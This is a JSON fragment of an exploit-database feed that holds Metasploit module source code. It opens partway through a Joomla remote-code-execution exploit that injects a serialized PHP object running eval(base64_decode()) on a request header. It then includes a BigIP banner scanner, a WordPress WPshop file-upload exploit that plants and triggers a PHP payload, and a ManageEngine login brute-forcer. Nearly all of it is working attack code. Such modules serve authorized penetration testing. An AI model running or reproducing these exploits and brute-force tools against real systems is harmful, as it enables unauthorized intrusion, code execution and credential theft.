'O:21:\"JDatabaseDriverMysqli\":3:{s:4:\"\\0\\0\\0a\";O:17:\"JSimplepieFactory\":0:{}s:21:\"\\0\\0\\0disconnectHandlers\";a:1:{i:0;a:2:{i:0;O:9:\"SimplePie\":5:{s:8:\"sanitize\";O:20:\"JDatabaseDriverMysql\":0:{}s:5:\"cache\";b:1;s:19:\"cache_name_function\";s:6:\"assert\";s:10:\"javascript\";i:9999;s:8:\"feed_url\";'\n pay = \"eval(base64_decode($_SERVER['HTTP_#{header_name}']));JFactory::getConfig();exit;\"\n post_pay = '\";}i:1;s:4:\"init\";}}s:13:\"\\0\\0\\0connection\";i:1;}'\n return \"#{pre}#{pre_pay}s:#{pay.length}:\\\"#{pay}#{post_pay}#{Rex::Text::rand_4byte_utf8}\"\n end\n\n def print_status(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def print_error(msg='')\n super(\"#{peer} - #{msg}\")\n end\n\n def exploit\n if check == Exploit::CheckCode::Safe && !datastore['FORCE']\n print_error('Target seems safe, so we will not continue.')\n return\n end\n\n print_status(\"Sending payload ...\")\n header_name = Rex::Text.rand_text_alpha_upper(5)\n res = send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'headers' => { datastore['HEADER'] => get_payload(header_name) }\n })\n fail_with(Failure::Unknown, 'No response') if res.nil?\n session_cookie = res.get_cookies\n send_request_cgi({\n 'method' => 'GET',\n 'uri' => target_uri.path,\n 'cookie' => session_cookie,\n 'headers' => {\n header_name => Rex::Text.encode_base64(payload.encoded)\n }\n })\n end\nend\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/multi/http/joomla_http_header_rce.rb"}, {"lastseen": "2019-11-27T19:18:46", "bulletinFamily": "exploit", "description": "This module scans for BigIP HTTP virtual servers using banner grabbing. BigIP system uses different HTTP profiles for managing HTTP traffic and these profiles allow to customize the string used as Server HTTP header. The default values are \"BigIP\" or \"BIG-IP\" depending on the BigIP system version.\n", "modified": "2017-07-24T13:26:21", "published": "2015-05-08T20:08:59", "id": "MSF:AUXILIARY/SCANNER/HTTP/F5_BIGIP_VIRTUAL_SERVER", "href": "", "type": "metasploit", "title": "F5 BigIP HTTP Virtual Server Scanner", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'F5 BigIP HTTP Virtual Server Scanner',\n 'Description' => %q{\n This module scans for BigIP HTTP virtual servers using banner grabbing. BigIP system uses\n different HTTP profiles for managing HTTP traffic and these profiles allow to customize\n the string used as Server HTTP header. The default values are \"BigIP\" or \"BIG-IP\" depending\n on the BigIP system version.\n },\n 'Author' =>\n [\n 'Denis Kolegov <dnkolegov[at]gmail.com>',\n 'Oleg Broslavsky <ovbroslavsky[at]gmail.com>',\n 'Nikita Oleksov <neoleksov[at]gmail.com>'\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://www.owasp.org/index.php/SCG_D_BIGIP'],\n ]\n ))\n\n register_options(\n [\n OptString.new('PORTS', [true, 'Ports to scan (e.g. 80-81,443,8080-8090)', '80,443']),\n OptInt.new('TIMEOUT', [true, 'The socket connect/read timeout in seconds', 1]),\n ])\n\n deregister_options('RPORT')\n end\n\n def bigip_http?(ip, port, ssl)\n begin\n res = send_request_raw(\n {\n 'method' => 'GET',\n 'uri' => '/',\n 'rport' => port,\n 'SSL' => ssl,\n },\n datastore['TIMEOUT'])\n return false unless res\n server = res.headers['Server']\n return true if server =~ /BIG\\-IP/ || server =~ /BigIP/\n rescue ::Rex::ConnectionRefused\n vprint_error(\"#{ip}:#{port} - Connection refused\")\n rescue ::Rex::ConnectionError\n vprint_error(\"#{ip}:#{port} - Connection error\")\n rescue ::OpenSSL::SSL::SSLError\n vprint_error(\"#{ip}:#{port} - SSL/TLS connection error\")\n end\n\n false\n end\n\n def run_host(ip)\n ports = Rex::Socket.portspec_crack(datastore['PORTS'])\n\n if ports.empty?\n print_error('PORTS options is invalid')\n return\n end\n\n ports.each do |port|\n\n unless port == 443 # Skip http check for 443\n if bigip_http?(ip, port, false)\n print_good(\"#{ip}:#{port} - BigIP HTTP virtual server found\")\n next\n end\n end\n\n unless port == 80 # Skip https check for 80\n if bigip_http?(ip, port, true)\n print_good(\"#{ip}:#{port} - BigIP HTTPS virtual server found\")\n end\n end\n end\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/f5_bigip_virtual_server.rb"}, {"lastseen": "2019-12-05T11:24:33", "bulletinFamily": "exploit", "description": "This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote code execution. This module has been tested successfully on WordPress WPshop eCommerce 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.\n", "modified": "2017-07-24T13:26:21", "published": "2015-04-24T09:21:49", "id": "MSF:EXPLOIT/UNIX/WEBAPP/WP_WPSHOP_ECOMMERCE_FILE_UPLOAD", "href": "", "type": "metasploit", "title": "WordPress WPshop eCommerce Arbitrary File Upload Vulnerability", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::HTTP::Wordpress\n include Msf::Exploit::FileDropper\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'WordPress WPshop eCommerce Arbitrary File Upload Vulnerability',\n 'Description' => %q{\n This module exploits an arbitrary file upload in the WordPress WPshop eCommerce plugin\n from version 1.3.3.3 to 1.3.9.5. It allows to upload arbitrary PHP code and get remote\n code execution. This module has been tested successfully on WordPress WPshop eCommerce\n 1.3.9.5 with WordPress 4.1.3 on Ubuntu 14.04 Server.\n },\n 'Author' =>\n [\n 'g0blin', # Vulnerability Discovery, initial msf module\n 'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module Pull Request\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['WPVDB', '7830'],\n ['URL', 'https://research.g0blin.co.uk/g0blin-00036/']\n ],\n 'Privileged' => false,\n 'Platform' => 'php',\n 'Arch' => ARCH_PHP,\n 'Targets' => [['WPshop eCommerce 1.3.9.5', {}]],\n 'DisclosureDate' => 'Mar 09 2015',\n 'DefaultTarget' => 0)\n )\n end\n\n def check\n check_plugin_version_from_readme('wpshop', '1.3.9.6', '1.3.3.3')\n end\n\n def exploit\n php_page_name = rand_text_alpha(5 + rand(5)) + '.php'\n\n data = Rex::MIME::Message.new\n data.add_part('ajaxUpload', nil, nil, 'form-data; name=\"elementCode\"')\n data.add_part(payload.encoded, 'application/octet-stream', nil, \"form-data; name=\\\"wpshop_file\\\"; filename=\\\"#{php_page_name}\\\"\")\n post_data = data.to_s\n\n res = send_request_cgi(\n 'uri' => normalize_uri(wordpress_url_plugins, 'wpshop', 'includes', 'ajax.php'),\n 'method' => 'POST',\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => post_data\n )\n\n if res\n if res.code == 200 && res.body =~ /#{php_page_name}/\n print_good(\"Payload uploaded as #{php_page_name}\")\n register_files_for_cleanup(php_page_name)\n else\n fail_with(Failure::UnexpectedReply, \"#{peer} - Unable to deploy payload, server returned #{res.code}\")\n end\n else\n fail_with(Failure::Unknown, \"#{peer} - Server did not answer\")\n end\n\n print_status(\"Calling payload...\")\n send_request_cgi(\n { 'uri' => normalize_uri(wordpress_url_wp_content, 'uploads', php_page_name) },\n 5\n )\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/unix/webapp/wp_wpshop_ecommerce_file_upload.rb"}, {"lastseen": "2019-12-02T00:29:51", "bulletinFamily": "exploit", "description": "This module will attempt to authenticate to a ManageEngine Desktop Central.\n", "modified": "2019-06-27T22:06:32", "published": "2015-04-08T07:05:56", "id": "MSF:AUXILIARY/SCANNER/HTTP/MANAGEENGINE_DESKTOP_CENTRAL_LOGIN", "href": "", "type": "metasploit", "title": "ManageEngine Desktop Central Login Utility", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nrequire 'metasploit/framework/login_scanner/manageengine_desktop_central'\nrequire 'metasploit/framework/credential_collection'\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::AuthBrute\n include Msf::Auxiliary::Report\n include Msf::Auxiliary::Scanner\n\n def initialize(info={})\n super(update_info(info,\n 'Name' => 'ManageEngine Desktop Central Login Utility',\n 'Description' => %q{\n This module will attempt to authenticate to a ManageEngine Desktop Central.\n },\n 'Author' => [ 'sinn3r' ],\n 'License' => MSF_LICENSE,\n 'DefaultOptions' => { 'RPORT' => 8020}\n ))\n\n deregister_options('PASSWORD_SPRAY')\n end\n\n\n # Initializes CredentialCollection and ManageEngineDesktopCentral\n def init(ip)\n @cred_collection = Metasploit::Framework::CredentialCollection.new(\n blank_passwords: datastore['BLANK_PASSWORDS'],\n pass_file: datastore['PASS_FILE'],\n password: datastore['PASSWORD'],\n user_file: datastore['USER_FILE'],\n userpass_file: datastore['USERPASS_FILE'],\n username: datastore['USERNAME'],\n user_as_pass: datastore['USER_AS_PASS']\n )\n\n @scanner = Metasploit::Framework::LoginScanner::ManageEngineDesktopCentral.new(\n configure_http_login_scanner(\n host: ip,\n port: datastore['RPORT'],\n cred_details: @cred_collection,\n stop_on_success: datastore['STOP_ON_SUCCESS'],\n bruteforce_speed: datastore['BRUTEFORCE_SPEED'],\n connection_timeout: 5,\n http_username: datastore['HttpUsername'],\n http_password: datastore['HttpPassword']\n )\n )\n end\n\n\n # Reports a good login credential\n def do_report(ip, port, result)\n service_data = {\n address: ip,\n port: port,\n service_name: 'http',\n protocol: 'tcp',\n workspace_id: myworkspace_id\n }\n\n credential_data = {\n module_fullname: self.fullname,\n origin_type: :service,\n private_data: result.credential.private,\n private_type: :password,\n username: result.credential.public,\n }.merge(service_data)\n\n login_data = {\n core: create_credential(credential_data),\n last_attempted_at: DateTime.now,\n status: result.status,\n proof: result.proof\n }.merge(service_data)\n\n create_credential_login(login_data)\n end\n\n\n # Attempts to login\n def bruteforce(ip)\n @scanner.scan! do |result|\n case result.status\n when Metasploit::Model::Login::Status::SUCCESSFUL\n print_brute(:level => :good, :ip => ip, :msg => \"Success: '#{result.credential}'\")\n do_report(ip, rport, result)\n when Metasploit::Model::Login::Status::UNABLE_TO_CONNECT\n vprint_brute(:level => :verror, :ip => ip, :msg => result.proof)\n invalidate_login(\n address: ip,\n port: rport,\n protocol: 'tcp',\n public: result.credential.public,\n private: result.credential.private,\n realm_key: result.credential.realm_key,\n realm_value: result.credential.realm,\n status: result.status,\n proof: result.proof\n )\n when Metasploit::Model::Login::Status::INCORRECT\n vprint_brute(:level => :verror, :ip => ip, :msg => \"Failed: '#{result.credential}'\")\n invalidate_login(\n address: ip,\n port: rport,\n protocol: 'tcp',\n public: result.credential.public,\n private: result.credential.private,\n realm_key: result.credential.realm_key,\n realm_value: result.credential.realm,\n status: result.status,\n proof: result.proof\n )\n end\n end\n end\n\n\n # Start here\n def run_host(ip)\n init(ip)\n unless @scanner.check_setup\n print_brute(:level => :error, :ip => ip, :msg => 'Target is not ManageEngine Desktop Central')\n return\n end\n\n bruteforce(ip)\n end\nend\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/manageengine_desktop_central_login.rb"}]}